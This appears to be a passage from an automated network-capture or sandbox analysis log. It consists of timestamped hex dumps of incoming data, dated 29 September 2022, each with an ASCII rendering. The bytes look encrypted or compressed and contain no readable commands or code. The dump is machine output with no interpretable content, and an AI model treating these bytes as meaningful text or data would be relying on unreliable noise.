                                                                                                                                                            2022-09-29 12:44:59 UTC4613INData Raw: 2e 06 fd 55 ed 8d 76 dc 3b 4e b1 ab 58 0e 4c 11 2c 4a e3 a0 a3 aa 3e de a8 fb c9 e1 58 92 5d 2e c9 09 6f 8e ab 7d c1 13 5b 45 58 78 39 fb 1f 05 bf cd 56 b8 9d 59 3e 00 3b 24 d5 38 f5 c5 0f 94 83 98 c4 bd 25 75 8e ef bd 72 e1 85 df 6b e7 3a d1 67 aa 41 2a 57 97 12 e7 2c 8d 28 88 f2 88 f8 c3 1b 31 51 bb c6 86 cc 89 31 2d 5e dd 2e ac 64 ad c9 22 8f e0 4d 2d cf 8c 1a e5 b2 20 56 6f 93 bf 00 82 9d c7 73 50 56 f6 30 25 85 1c fc 28 46 04 2b b1 4d 94 13 f2 4d be 66 3d 20 9f 76 c0 ec aa 66 40 ea 6e 41 b1 f1 e1 da 72 9f df 2b 64 da 2f 61 e0 24 46 0f 35 22 d4 d8 20 86 e6 01 ff 79 0c 7d 00 46 36 b8 e6 ee 0d 93 60 bf e7 9e 9d 02 5a b6 18 6d cf f8 a1 a5 4e 7f 89 bc a6 86 f3 73 b3 24 2c 54 ea 21 7a 67 d1 62 c2 e2 11 59 30 ae 5d b4 d6 e9 c8 6f cf a6 7c 2e 56 b1 8a 7f 06
                                                                                                                                                            Data Ascii: .Uv;NXL,J>X].o}[EXx9VY>;$8%urk:gA*W,(1Q1-^.d"M- VosPV0%(F+MMf= vf@nAr+d/a$F5" y}F6`ZmNs$,T!zgbY0]o|.V
                                                                                                                                                            2022-09-29 12:44:59 UTC4629INData Raw: a4 0e d7 67 62 72 d5 c9 4e 9a 2f 5f 73 cf 56 ef 03 c5 8e 51 3c 05 34 67 63 b8 26 9e 58 68 16 c4 81 7d e4 31 bd ca 84 64 0f 8a a9 fb 7b 23 c8 cd 7b 6a 71 fe 2a 5d 8d 0d b8 0b 9c 22 ba 56 c9 71 ff c6 75 4b 3d 25 d9 78 a2 b3 0a dd 08 c0 52 52 ca c6 0f 5c 43 96 8f ad 94 b3 65 ed be 5e 34 f5 d3 18 35 37 4c 6c 29 ef 14 cb 94 b4 f9 26 80 f5 0c e8 6f a0 f0 af 17 dd 5d 66 f0 9e 0e c9 7e 97 b9 de 75 14 69 1d b5 ab d4 5c 80 58 e2 0b 95 48 52 04 03 c6 f6 9f b5 3e 54 14 ee a4 25 b2 7f 37 7f 31 3a 08 bd 1d 0b 40 0a 5d 18 ad 95 05 7d 76 eb 2a 80 e9 1a d8 16 2d 17 64 7d ab ed 6e 44 b1 57 cc f0 a7 bc ba e8 6c c4 31 b7 27 14 6e 29 f7 cc eb 6a 00 5e ce 9d af ab be 49 10 52 2f 42 2a f9 b2 36 13 c3 f3 d3 24 5b 08 8d c6 da 14 72 cc ba 58 6a 99 34 0d 33 60 bd 61 d0 04 c9 4b a7
                                                                                                                                                            Data Ascii: gbrN/_sVQ<4gc&Xh}1d{#{jq*]"VquK=%xRR\Ce^457Ll)&o]f~ui\XHR>T%71:@]}v*-d}nDWl1'n)j^IR/B*6$[rXj43`aK
                                                                                                                                                            2022-09-29 12:44:59 UTC4645INData Raw: a3 ef 05 77 93 eb cb 90 cf b6 e3 8d 0f e5 5d 34 2c b1 5a a1 a7 75 6a 00 71 ef a5 55 7d 00 e1 39 0b 91 70 c6 fc 49 bd 6d d9 4b bc 1c f8 c2 21 5b 4a ec fe e7 7a ee 6f 69 57 0d 26 91 24 f6 49 23 1c fb 9d e4 88 70 1f 7c 06 26 a6 68 66 26 86 9d 40 6c 68 7f 93 18 e5 53 48 f6 b7 51 19 e2 90 9c 41 6e ab 62 ba b0 9b 1a 74 0a aa 73 11 2f 61 cf c8 5f ce cc c0 98 c4 6b 94 68 a5 1b 07 4f f3 f9 8a 3d 48 90 47 7a 64 46 08 71 4a f8 9a e9 3b e6 87 49 cb 1e 5d 5f c4 71 dc 44 1a 35 ed 96 f6 64 42 ba 2f 11 78 f4 46 c4 e7 a4 e8 ea 0c 36 e0 cb 8e 85 cf 77 1f 8a f0 7a fb 20 2d 57 8c c7 40 eb 4e c4 12 6e e5 52 87 fe 54 f1 9f 85 42 55 b5 c7 3d 01 01 cd 45 31 c0 e0 33 b7 e2 99 ac f6 c0 03 76 60 fd 91 7a 23 48 4a 45 ce 84 41 b8 e1 7c 74 92 bd 63 4c 69 d5 9e 7b a5 06 f0 9e 28 22 68
                                                                                                                                                            Data Ascii: w]4,ZujqU}9pImK![JzoiW&$I#p|&hf&@lhSHQAnbts/a_khO=HGzdFqJ;I]_qD5dB/xF6wz -W@NnRTBU=E13v`z#HJEA|tcLi{("h
                                                                                                                                                            2022-09-29 12:44:59 UTC4661INData Raw: 5e 2d 69 e5 37 a5 55 e1 71 1b 40 5c 95 3f 78 5a 8d c0 b6 05 52 15 2b 92 93 cd bc 24 be d3 a3 8f ad 61 d4 8c 2d f9 76 d2 79 fc 2a c2 b8 be fd 35 36 b8 d3 68 7f 44 04 50 ff 00 22 78 c0 5f 84 1e 44 d5 c3 5d 98 17 63 e9 1e 0b cd a2 d4 20 ce 44 d2 de 5a 85 72 06 a5 fb a7 35 ee ef da da d0 b6 92 e0 55 b0 3f b0 75 92 95 85 76 17 ec 2e b3 7c a2 eb 83 e0 ad 64 ea f7 6b 81 c1 e8 56 47 86 41 a4 67 28 4e 8b 6c f8 38 d0 6c a1 f7 23 27 f1 2f 24 78 6a 48 2c 75 c2 f4 42 b6 74 af b8 e5 95 76 3b 6a 08 5c 6d 66 e9 6f b2 4a a7 bc 67 0d 82 1b 8b 12 47 c8 50 84 ae eb 49 64 0d bb 3c c8 84 06 47 1c b1 eb 30 16 e6 5d d5 92 4a fd b8 47 03 1e 1d 44 70 ba 55 c0 b1 96 44 67 8d c6 13 6e 6b 79 32 de f6 1d 04 0f 7e 6d 8f 20 6d 2c 6b 06 a7 51 70 ac 3c d8 40 03 01 d3 c5 27 d4 b1 17 93 cf
                                                                                                                                                            Data Ascii: ^-i7Uq@\?xZR+$a-vy*56hDP"x_D]c DZr5U?uv.|dkVGAg(Nl8l#'/$xjH,uBtv;j\mfoJgGPId<G0]JGDpUDgnky2~m m,kQp<@'
                                                                                                                                                            2022-09-29 12:44:59 UTC4677INData Raw: b3 08 4d 03 c3 36 20 61 75 d8 cb 07 6e e9 1f 42 7b dc ec 03 6d ab 83 7d c3 73 fe b9 6b 54 96 18 77 f9 d6 57 60 1f c4 71 7b e2 cc 59 03 8c 24 a8 56 49 28 ed 19 b1 a4 86 1c 30 6a d6 db 6b c2 b6 9a 6c 1a 32 7a ad a3 58 25 8a 2c 73 c4 b4 8c 35 51 31 3e a8 72 4a ea ca 50 12 dd 14 b0 86 77 02 80 a0 dd 95 b9 dc 09 e7 bf f1 d4 b7 f2 50 3b ab c1 73 24 8a 6c e3 f9 e2 ab 88 62 32 40 6c 52 0b 5d 63 d9 92 f2 63 26 46 30 8d e5 83 3b 66 7c 94 25 6c e5 87 7b ab 1e d0 af 0e 4a 5c 22 48 81 a2 a7 53 7e 1e d8 9c ba 10 fe a9 22 e6 5e ad 01 7e b3 f2 a6 93 71 a6 7b 53 62 8a d3 cf 45 d9 db 03 8c 2d 82 8a 6c e3 7f 18 fb f9 4f 76 d0 5f d6 dd 5b 4e 8d 57 10 4b ae 32 e3 e1 8a a4 3c 91 b3 3b e3 fc 57 b4 6f fe 7a 3b 1d c0 e9 43 8b b3 21 ed e2 25 0f 49 da 15 78 94 90 0e 06 50 1b bf 88
                                                                                                                                                            Data Ascii: M6 aunB{m}skTwW`q{Y$VI(0jkl2zX%,s5Q1>rJPwP;s$lb2@lR]cc&F0;f|%l{J\"HS~"^~q{SbE-lOv_[NWK2<;Woz;C!%IxP
                                                                                                                                                            2022-09-29 12:44:59 UTC4693INData Raw: a4 bf 09 f7 31 a3 d7 ab 6e 7c 8a 3f f0 93 de 2b ff 3f 94 a3 ba da d8 c5 d1 d1 39 82 28 3c cc de 7a 42 98 20 12 76 a7 b9 82 d9 3d cb 2e 94 e5 7f fa 9a 15 7d c4 92 e3 0d 5e 01 d9 98 53 b5 d4 e1 b0 17 16 3a 5a a7 e2 24 a9 26 81 62 78 33 5f bc 3f 40 b3 61 53 07 0d f7 15 1a df 61 46 58 37 93 40 13 87 ce e5 04 a8 67 ca 8d bb 43 a7 a7 0f a4 aa 2d 7d 73 aa c7 31 07 a4 52 96 3a b9 38 b9 d3 1a 8e bb 7c 69 05 f4 ad 13 9f 5c 90 29 fd c5 34 35 05 1a 48 a0 cd a8 d5 bf 60 40 b5 39 e2 60 d1 b4 bd 25 b3 88 56 d3 dc 11 ed e7 6c 2c 0d 6c 94 2c 9c c5 7c da 16 ac 5b 05 36 80 6c 45 de f2 06 78 0c f9 ec 8b 18 5c 5d d2 9c 9f 2c bb 5c ea 15 18 be e0 01 4d 37 2e d4 98 6f 11 23 7d a3 21 4a e6 16 27 f4 ea 4d 1b c3 ad ae 67 0e f7 34 c0 3c a4 ed c7 cb b7 0a b6 e5 9b a6 cc 1e 73 ea 33
                                                                                                                                                            Data Ascii: 1n|?+?9(<zB v=.}^S:Z$&bx3_?@aSaFX7@gC-}s1R:8|i\)45H`@9`%Vl,l,|[6lEx\],\M7.o#}!J'Mg4<s3
                                                                                                                                                            2022-09-29 12:44:59 UTC4709INData Raw: a1 cd b9 03 41 ad 7f f5 5b 86 0e c8 08 03 df ce 53 a0 f2 ec 9c 24 3d 72 a4 6e 3c df 51 23 4c 19 6d 9d 22 55 e5 b8 c5 a8 5a bc 5b ce b0 41 35 29 5b 8a de 2d 0f 3b f9 81 63 6d 59 39 35 98 ef 3b 25 64 c0 80 d3 6c c2 7f 65 9d fb 64 66 02 b1 d5 13 a6 11 7a 45 56 35 a4 4f 32 4e 58 17 7c 30 35 a7 d9 7c 62 99 61 05 b6 4c e9 b0 99 8f 54 5e 49 c5 32 bb e4 c9 8a f8 3d df eb 0b 9e 17 00 a5 65 b0 db 74 34 2b 49 87 3b 25 4b 76 90 07 2f b6 dd 1d 13 42 a4 2a 39 b6 c4 c2 5e c5 d6 ba ce f6 9c b2 f8 6e 94 bd 08 65 bb 2b 57 c4 25 57 36 37 f9 ce f9 f8 a1 4f 69 90 9d 89 e1 32 b4 29 6b 46 fb 80 1a 4f 73 e9 6e c1 cb 8d c0 a6 5f 6d f4 49 ed 6b 6b d0 a1 0a 4b 4e 8b 70 a7 a6 2c 8c 6e ee 7e 50 a0 fc d9 91 d8 27 13 46 38 a4 e6 94 5d 34 d7 8e cd c8 1d 0e 2c 59 ef 75 1b a4 10 1c d4 31
                                                                                                                                                            Data Ascii: A[S$=rn<Q#Lm"UZ[A5)[-;cmY95;%dledfzEV5O2NX|05|baLT^I2=et4+I;%Kv/B*9^ne+W%W67Oi2)kFOsn_mIkkKNp,n~P'F8]4,Yu1
                                                                                                                                                            2022-09-29 12:44:59 UTC4725INData Raw: 05 fb 7e dd 35 26 69 2f 58 cb 13 d2 36 7c c2 38 82 50 a5 06 cf 7f 96 69 f7 d9 72 32 1b 16 e8 07 1c c1 07 53 70 18 88 bf c0 44 17 07 91 12 c6 b2 bf 04 89 89 f1 f0 17 bf 3a 10 24 2d 61 32 9e d2 b3 00 46 6f 2f dc 80 df 14 ec ee 9d 3a ec c7 a7 a5 d9 c7 5f c1 1e e0 97 b0 3d 95 32 22 4d 17 38 10 b1 64 49 e7 49 01 9f 15 6f 46 b0 dc 19 e8 7b bd bc a6 b9 eb 80 a8 43 74 62 d5 34 d6 21 7c a4 d9 7a 2e c3 36 0d cd 55 75 cb e5 5e 36 29 00 b6 4f 86 70 d5 53 74 c4 94 a6 4e bb 9e 5e 6e 48 e4 10 d1 84 b8 2b 4c 3f 34 41 9c 7c f6 bd a9 fe a4 36 4d f9 7f 37 88 36 0b 5c 7e 12 f8 27 08 39 19 6d c5 31 96 5c 77 44 f7 6c 11 d4 23 b5 95 24 e4 34 4e 3f 57 7d a9 7c a0 3a 1b 5e dc 55 c7 37 ce 05 10 b5 94 a4 91 17 59 cf b8 23 32 6e 83 d1 d5 44 b2 71 4c 6f e2 0f 42 fc 8d ea 54 02 09 e0
                                                                                                                                                            Data Ascii: ~5&i/X6|8Pir2SpD:$-a2Fo/:_=2"M8dIIoF{Ctb4!|z.6Uu^6)OpStN^nH+L?4A|6M76\~'9m1\wDl#$4N?W}|:^U7Y#2nDqLoBT
                                                                                                                                                            2022-09-29 12:44:59 UTC4741INData Raw: 7f ec 55 9c 49 c4 03 9c c8 6e 71 67 2f 08 e5 30 40 dc fa 34 ce 24 33 fb 20 79 39 20 dc 6a 3e df 4b 05 cb a9 d5 6f 35 49 81 c9 62 35 0c e0 35 46 24 48 98 79 17 de 33 10 18 de 87 16 98 58 b2 3e 08 d9 06 43 ef 0f 18 bf cb 23 73 89 6f e7 b0 ac b3 b6 a4 1a cf 7e 57 e5 f8 03 f7 fa ec 6b 2d ab bd 21 3a 56 c0 4e 8b 9e 89 fe d5 d4 e8 d8 d6 77 56 05 ff be ed aa 7e e0 93 84 ec 38 1c 55 db d3 f4 76 3e b6 74 2d 11 72 e0 39 59 01 89 22 3c 27 5c c7 81 fd 6e 78 df 31 97 50 b5 cd 2d 53 fc f4 a8 df 99 52 69 16 36 b5 19 f9 a4 2e 1a 19 fa 36 7b fd 3e 1a 27 51 3a d7 e4 25 31 ab b6 51 b6 d2 da 68 df cb 50 3c 8e 18 65 ce c6 13 03 89 f5 3d 8f 02 47 99 4f 34 f1 4e fa 88 9f da 07 b8 c4 55 f6 aa d7 9f 7b 88 f6 60 6e d1 96 43 56 78 2b 60 74 c9 84 b0 b0 52 a6 e1 c8 13 ae df 01 67 22
                                                                                                                                                            Data Ascii: UInqg/0@4$3 y9 j>Ko5Ib55F$Hy3X>C#so~Wk-!:VNwV~8Uv>t-r9Y"<'\nx1P-SRi6.6{>'Q:%1QhP<e=GO4NU{`nCVx+`tRg"
                                                                                                                                                            2022-09-29 12:44:59 UTC4757INData Raw: 78 5b 6f 2c 43 2a 48 29 d0 22 db 96 48 92 61 86 c6 c0 ec 05 c0 92 86 d0 dd 72 da 5c 7e df 92 02 c6 fc d2 84 07 ed 6e 3d 85 82 05 3e 3d 2e 04 e3 76 f9 dc 18 35 1a b5 5e 54 d4 04 a8 01 1a 70 9e 47 e0 50 2e 46 50 68 0f e0 71 58 8e e1 cd 4c 2c 7b b1 1c 6f 5a ce 4d 7c 64 c3 d8 97 e2 b9 97 99 61 76 9f 5b f9 37 2c 25 66 34 5c d3 70 1a f5 cf 95 28 b0 bb 75 e8 e3 9d a5 18 b1 b2 eb db 18 2c 8d 96 35 bf 2d d8 fe d9 8e 3d 55 78 b5 1c b6 8a 4b 87 05 3b 9b 21 85 6e f0 95 39 77 00 3d 09 35 36 1a 6e b0 d1 da 6e 33 58 ad e1 12 96 e5 97 63 71 d8 71 52 49 16 03 b3 64 dc 52 f6 7a e6 f7 e7 55 74 7f 80 e0 7b e8 5c 8b 29 97 3a e4 91 a7 d5 50 00 b7 d9 af d4 c0 15 9b c1 dc d2 60 28 cd d4 ab c9 16 0f 68 28 25 8c f2 17 fb 82 92 fb 76 88 35 2e a4 91 36 c2 5b ad db 1c 1f 33 fa 3c 1b
                                                                                                                                                            Data Ascii: x[o,C*H)"Har\~n=>=.v5^TpGP.FPhqXL,{oZM|dav[7,%f4\p(u,5-=UxK;!n9w=56nn3XcqqRIdRzUt{\):P`(h(%v5.6[3<
                                                                                                                                                            2022-09-29 12:44:59 UTC4773INData Raw: 43 b2 9c 7f 98 57 55 1f 2e 76 83 6b 65 bb 8c 8c 7f 59 d6 c5 fe ba 70 3b 14 a9 6c 33 33 30 03 9d f9 d5 97 18 25 1a c3 29 bc cf 27 3d 99 49 97 ab 91 1d 68 66 79 23 a7 84 09 8f a2 b4 2d c7 b6 9a 2f b6 e3 8f 23 09 b8 a5 f3 27 b2 28 fa d3 39 3f 0b 8c 24 3b 7e aa 2d 27 05 c2 31 7b 68 17 2e f5 5a c2 fc d3 b4 c6 ac 52 26 47 f4 f2 23 ba 7a 04 7c c2 65 34 25 7d cb 6b e5 e0 3e cb 80 f2 c0 dc 25 26 da 9e 44 d8 ef a9 1f 10 4b 26 39 b4 f8 d5 55 04 c1 72 d4 08 f9 8b 78 19 bd f9 f9 37 c4 3e de e5 79 98 d2 69 0d 06 b7 15 04 cd 14 d3 d3 90 22 20 e8 9f 3a 78 19 2a f5 02 d0 d0 6b 9a a7 03 3f 4f 69 ac ed 1c e9 a4 93 dc 9a e8 c6 c7 7f 8c 21 79 da 38 d7 41 ea 73 59 af d2 4c 19 7c 2e 28 11 d0 9a e7 52 4d bd 4f 39 00 69 13 a6 5d a6 8b 15 95 04 8c 31 4d 61 95 1e da 4b 6a 29 04 d7
                                                                                                                                                            Data Ascii: CWU.vkeYp;l330%)'=Ihfy#-/#'(9?$;~-'1{h.ZR&G#z|e4%}k>%&DK&9Urx7>yi" :x*k?Oi!y8AsYL|.(RMO9i]1MaKj)
                                                                                                                                                            2022-09-29 12:44:59 UTC4789INData Raw: c5 4a 59 de 94 db 03 68 76 22 35 1b 2a 16 a6 94 bd d7 fe 83 6a f9 a3 80 9f 17 12 3b f6 b7 b6 6f b3 d3 55 12 f2 12 bf 6a 19 3e 28 44 d2 a8 23 82 1e a7 45 ce 6d a9 b1 03 ee b1 76 21 c9 c0 7b 82 22 49 94 d4 84 3f 0e 45 1c b1 e6 ce 06 4d a3 2a 10 d5 d2 38 cf 63 28 fe 8e 41 0e 40 11 bf 22 fa 37 ac 85 87 a4 4d cf bb d6 83 ee 62 87 fb dd fe 74 84 eb 85 ca d8 5e 91 e6 54 f8 f1 9f 29 a6 e6 49 d0 b0 27 93 d5 b0 43 7c 3d 72 bb ef 26 5b 7d b1 b4 f0 e5 21 ed f5 7a 2a e4 e7 d0 71 3a 5c b2 d9 c6 fc 1a f6 df d0 8a e8 e9 3d 15 b8 97 75 e3 0e ea b5 53 4a 58 d4 ef 2f 93 9b 21 1b b1 2f 47 57 7c 55 29 75 51 ea 05 5b 02 fc d0 d1 e3 f6 1a a5 12 69 5d 51 2b c0 18 2f cd e1 86 cd 97 33 ec 75 e9 db 5b 76 57 c4 5f 5c 4c 34 d6 31 65 c6 42 cf 66 ba ee c5 ba 25 c9 cc ab 86 fe 52 69 89
                                                                                                                                                            Data Ascii: JYhv"5*j;oUj>(D#Emv!{"I?EM*8c(A@"7Mbt^T)I'C|=r&[}!z*q:\=uSJX/!/GW|U)uQ[i]Q+/3u[vW_\L41eBf%Ri
                                                                                                                                                            2022-09-29 12:44:59 UTC4805INData Raw: cd 85 8b ed e9 0e 8b ec c8 1a 77 94 4e 49 39 0a c4 3b b6 56 8e 18 87 8b 8f 0a dd 7d a5 2e e8 29 fb b8 2b 29 46 58 df b5 da 5b 94 b8 9c 49 fd 24 6d 44 5d 34 34 12 e8 2c e4 61 22 7f 21 ad f3 00 11 d5 53 da 39 ed b9 1b 00 c5 49 fd c5 c9 ed 09 1e 96 ec 96 aa c0 8e 62 83 17 15 1d 47 72 a5 3d a5 70 9c 5b ae 84 81 fe b9 b2 76 bf 4f af 52 69 eb 1b c9 b8 a9 48 ba 38 47 7e 0e fc 76 e3 b0 2b c1 15 b4 ff 58 26 06 cb f5 b9 c7 e4 7f 5b c5 51 e2 bc 4f 91 fe e6 6d fb 4c ca d5 83 23 2b ba c8 cc 57 44 47 87 9a 6a 81 fb a7 00 2c 5e f5 dd c7 52 cf 8d 45 83 e0 eb 81 db 00 49 e2 e8 e0 7d 11 31 0d 8f 5c 21 de 24 d4 b9 d8 83 40 a9 5f e3 73 92 26 02 a6 5b 67 69 da c2 f6 f2 8d 6f c2 45 8a 6c aa 7e e8 b0 9d ac 09 5d 47 24 f6 5a e7 34 32 61 85 6c 7a 88 b2 63 3d 2c d4 ec 60 9b e8 81
                                                                                                                                                            Data Ascii: wNI9;V}.)+)FX[I$mD]44,a"!S9IbGr=p[vORiH8G~v+X&[QOmL#+WDGj,^REI}1\!$@_s&[gioEl~]G$Z42alzc=,`
                                                                                                                                                            2022-09-29 12:44:59 UTC4821INData Raw: 34 0a 3b 99 a4 28 71 43 39 50 14 87 04 74 da d6 5d 9b ea 61 8c 63 12 20 34 d1 44 6d 34 60 df 5c 26 ba 7c 96 8c da e8 4c 3f 5b de 8d f7 ed 87 3d 69 49 ee 86 68 32 43 52 d0 d1 f4 b6 8b 76 c7 bc 00 6a d2 5e a9 88 e8 8c 0c f4 7e 15 3c 8e 00 89 dd 16 79 16 1b 14 ee 0f f3 9f fc 66 9a 70 ed 02 83 0b 1c a8 79 b8 22 d5 c6 2d ac 0a 43 c2 c1 49 f9 38 25 c1 2a d7 b6 df 5a ce 2d d9 d9 f2 6d d3 48 04 54 70 78 5e b7 5d 70 3a 8f 27 58 18 90 a4 e2 cc ab bb b3 c9 5f 8b 31 bf 3e 77 26 f6 e2 32 03 5e b2 11 58 64 55 b6 03 2f b1 32 94 9e fe 73 a3 82 5d 5c bb e9 38 e1 52 22 f7 e5 dd d9 d9 b5 dd 2e 1c 0c 8a 8d 1a af a1 1f 67 3d 6a 3e f2 27 de 9c 77 62 d4 26 97 8c 59 a9 79 39 72 d2 a4 e8 fe 8f c2 6f 27 77 c6 3c c4 15 ed 9b 02 05 29 79 55 c9 e3 a7 3d 1f 6e a1 3e 3f f1 a1 cb d8 73
                                                                                                                                                            Data Ascii: 4;(qC9Pt]ac 4Dm4`\&|L?[=iIh2CRvj^~<yfpy"-CI8%*Z-mHTpx^]p:'X_1>w&2^XdU/2s]\8R".g=j>'wb&Yy9ro'w<)yU=n>?s
                                                                                                                                                            2022-09-29 12:44:59 UTC4837INData Raw: c9 87 4a fc 82 bc 46 2f eb 50 ea 56 63 2c c4 94 3d 5a ed 72 66 71 58 0e d0 1b bd 61 74 74 07 89 27 15 72 08 5e c4 66 93 07 bf 5f 76 56 89 a2 17 03 78 25 50 1f ae d0 42 e9 6b 28 bc 36 e9 51 19 82 20 c7 52 41 b1 9c 4d 87 3a 72 82 19 89 08 09 2d 5c 59 d4 f3 5b 71 a8 18 c5 1a 16 1d cf 47 be 1c 44 3e 5e 83 30 c3 e7 84 04 46 f9 69 59 b4 f8 82 9c 67 12 69 2c 46 e6 aa ed 2a 6b e1 0c 71 c1 29 ed 6a 12 d6 3c e0 f0 27 4a b4 44 59 7a 5b 12 b6 5e d8 83 37 60 1a 89 6c 73 c8 bc 55 06 17 f1 be 17 73 f9 5b bd ba cd 73 25 be d5 f6 eb 79 6c b1 45 20 1a 4e 43 09 b6 b9 11 e8 bd f6 02 a9 91 c2 53 3e cc eb 14 8b 61 02 b1 9d 53 6f 67 2a a5 7b 8b ea b6 d6 c9 5d c6 10 c1 1c 32 1d d2 31 1a 60 bb dd 66 26 18 70 85 e7 a2 54 c7 de 54 ae d5 27 d1 b2 44 2c 1f 8d f8 d6 3f d5 7a 20 b0 bf
                                                                                                                                                            Data Ascii: JF/PVc,=ZrfqXatt'r^f_vVx%PBk(6Q RAM:r-\Y[qGD>^0FiYgi,F*kq)j<'JDYz[^7`lsUs[s%ylE NCS>aSog*{]21`f&pTT'D,?z
                                                                                                                                                            2022-09-29 12:44:59 UTC4853INData Raw: a1 d5 0c ac 94 25 a2 c5 46 f2 44 75 9a 71 99 94 ef 86 e8 b9 d7 b3 c4 f2 ff 56 f6 fc 87 c6 0b b9 20 bc 66 e2 08 67 73 29 e1 67 18 c9 7c 3a fb 27 31 14 9c dc 8a 0c 8c 64 fb 55 2d 91 13 91 74 22 a4 88 51 58 4d 3a 20 d0 d5 65 5b a7 b7 7e 46 61 c8 24 24 2f d8 90 ed 3c 99 32 08 b4 45 5f 4c d0 16 a4 56 27 a5 ed 63 ff aa df 24 22 8c 74 f2 b8 2f 20 ff d1 49 2c ae f8 de 85 27 50 13 3d 0d f7 55 57 b4 18 19 69 44 1c 10 8d dd d5 4f b4 b7 e8 6c e1 0e 6b 1c c5 be e5 9a 3b 05 54 95 59 a9 f3 07 ab 5e 5b bd e7 47 5d b2 ce 2a dd 15 13 5d 7b c7 6a 83 28 d4 51 4e 02 8d 75 62 a3 a8 e7 f9 35 b1 41 8c a4 37 5c 96 22 dd 89 f9 eb 83 88 7d 87 1d ac 8e ce 26 13 8f 77 0c ef 2a 01 08 4f f6 71 53 75 91 1a a7 e1 2a 01 ce d7 18 1f 4d 5d e2 3a bc 78 77 54 82 48 71 c1 77 a2 79 51 5e 05 1d
                                                                                                                                                            Data Ascii: %FDuqV fgs)g|:'1dU-t"QXM: e[~Fa$$/<2E_LV'c$"t/ I,'P=UWiDOlk;TY^[G]*]{j(QNub5A7\"}&w*OqSu*M]:xwTHqwyQ^
                                                                                                                                                            2022-09-29 12:44:59 UTC4869INData Raw: d7 7a 6e d7 43 bc 72 a4 fa 5c fb a4 db b3 c2 40 6a 05 7c 86 95 c9 d9 12 f5 fb c0 ee dc e6 a0 96 6b 6b d9 0f a5 56 39 f6 3a 86 5a 4e ee 52 d3 b1 d5 44 7a 47 04 2a 81 34 a5 23 a9 e3 4e 2d eb 73 15 60 ee 30 bc cc b7 f2 67 97 6a 35 ca 7d 20 85 63 8a 25 58 02 85 b9 3a 47 08 d4 3c ae 22 3b 3a 8a 91 49 dd 42 c7 1a 9e f7 49 82 d3 b6 99 24 0f e6 00 1e ee d5 73 b8 d2 cf 35 9b 19 19 06 b1 8e b3 a7 48 67 b2 09 4d 34 2b 4a d1 a3 85 9b 52 34 55 4a 11 e7 6d ae 34 40 7e b4 e2 98 85 76 30 28 5d 46 c4 ca 41 ba a5 3a 0b 3f f5 5d b5 dd ec 04 21 2e 0f 26 01 47 4d e8 3c e2 94 8b 97 71 7d 23 93 2d 1e 67 c4 56 03 af ed d0 b2 7f 78 6c 91 8a d4 4d 11 06 cc b2 85 87 b8 65 a5 b6 b6 88 45 3c b8 c9 3d 6e 43 80 98 a6 eb 79 6c 84 c0 e0 b7 38 1d d6 d7 5a 07 96 4b 81 35 97 a3 8e 51 90 0e
                                                                                                                                                            Data Ascii: znCr\@j|kkV9:ZNRDzG*4#N-s`0gj5} c%X:G<";:IBI$s5HgM4+JR4UJm4@~v0(]FA:?]!.&GM<q}#-gVxlMeE<=nCyl8ZK5Q
                                                                                                                                                            2022-09-29 12:44:59 UTC4885INData Raw: 60 5e db b1 d8 5b b1 fd fb b6 23 a1 fc eb 95 83 d0 35 8f 5e 68 52 27 bb 68 5f 00 f1 9b d2 27 2e 9a 9b d1 3c e7 54 61 ab 77 5d 76 2d bc 45 3a c5 11 f9 09 9a 80 c3 35 34 17 01 00 50 0e 53 49 d9 40 71 5c 6d 3a b5 8b 81 9b af 64 57 17 7c 93 1a 46 55 3c 04 7a 4d b4 22 95 45 84 39 05 c7 c9 69 d5 97 d6 4e 32 38 15 03 08 51 67 07 24 0c 0a 3d 3c b8 65 d1 56 1b 39 18 2f bb a4 29 ee 2e 6e a2 4e fa ae c1 e9 38 fb f9 1f bb 3b 6f 68 49 c8 f5 7c b8 2b b4 64 29 7c cb 48 c7 bd 17 c0 12 a8 f8 c3 54 63 2f 74 d2 56 2f 75 14 a4 19 45 c2 5b 12 61 73 d5 12 92 63 71 15 2d 7e b3 a2 ba 8a 9e ad 41 dc b7 1e 59 55 e8 43 75 07 ac 8f 10 c1 cd b8 f5 b3 b2 ee 32 a8 4e 1d cb 40 47 80 3d e9 97 0b d4 5c b3 a6 80 6c 4b 73 4d 69 b2 95 4a 42 95 c8 d8 49 21 27 81 c6 21 bb 30 ce 76 45 bb 04 5b
                                                                                                                                                            Data Ascii: `^[#5^hR'h_'.<Taw]v-E:54PSI@q\m:dW|FU<zM"E9iN28Qg$=<eV9/).nN8;ohI|+d)|HTc/tV/uE[ascq-~AYUCu2N@G=\lKsMiJBI!'!0vE[
                                                                                                                                                            2022-09-29 12:44:59 UTC4901INData Raw: 27 a2 4f bc 14 fd ac 61 cc 2e ca 4f b6 5b 38 4c e8 d5 cd 93 60 73 a6 e6 df 9e 8e e0 11 5d a1 f9 21 54 3e b3 1f 20 ec fd c1 4b c8 99 14 f8 f3 f7 85 c1 95 ef e0 0e d5 1f aa a3 8a 4a 84 f5 c0 03 03 74 3a 9c e2 d0 dc 16 d7 7b 98 0c 2d ee 1c 39 00 73 72 64 26 d0 a7 d1 05 bc f4 10 94 6b 29 83 2f 10 f6 f2 f1 2d ad 81 93 d2 49 cf 6c b8 42 52 b9 a6 c1 01 51 34 0c c0 04 76 81 2d 9a 15 2f c6 ff 57 42 3e 37 57 7a 25 48 0c c6 7a f1 5d af 77 e0 08 6b 9c ad 86 5c 01 d6 4a 81 8a 91 64 43 23 29 2b ec 1e b1 0f 82 4d 1a 25 df 75 21 a2 5d 14 24 87 9e 3c 4c 99 8b d9 f4 d2 a8 b4 3f 6d 96 5b 0e f4 91 77 38 c6 d8 17 ff c9 c4 d7 8c 86 74 ce d5 6a 96 28 60 36 8f c9 ab 8c a5 02 b6 e9 56 f5 5f d4 0a 01 c5 de 1a 18 90 bb 15 74 97 b7 6c d2 dd 38 28 f0 dd 10 0d d4 b0 6b 8b 60 82 65 06
                                                                                                                                                            Data Ascii: 'Oa.O[8L`s]!T> KJt:{-9srd&k)/-IlBRQ4v-/WB>7Wz%Hz]wk\JdC#)+M%u!]$<L?m[w8tj(`6V_tl8(k`e
